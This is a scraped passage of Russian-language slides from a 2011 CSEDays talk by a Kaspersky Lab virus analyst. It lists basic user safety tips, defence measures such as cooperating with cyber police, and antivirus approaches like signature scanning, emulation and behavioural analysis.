  202. 202. Не переходить по сомнительным ссылкам
  203. 203. Не доверять запоминание конфиденциальных данных программам</li></ul>CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  204. 204. Что делать?<br /><ul><li> Разработка технологий, продуктов и сервисов защиты от ИТ угроз
  205. 205. Сотрудничество с киберполицией и государственными структурами
  206. 206. Обучение </li></li></ul><li><ul><li>Сигнатурный сканер
  207. 207. Эмулятор
  208. 208. Поведенческий анализатор
  209. 209. Списки</li></ul>Различные подходы и технологии<br />CSEDays. Theory 2011<br />Екатеринбург, 14-17 апреля, 2011<br />
  210. 210. Международное регулирование<br />| 12 October 2010<br />Kaspersky Lab PowerPoint Template<br />
  211. 211. Алексей Кадиев <br />Вирусный аналитик <br />

×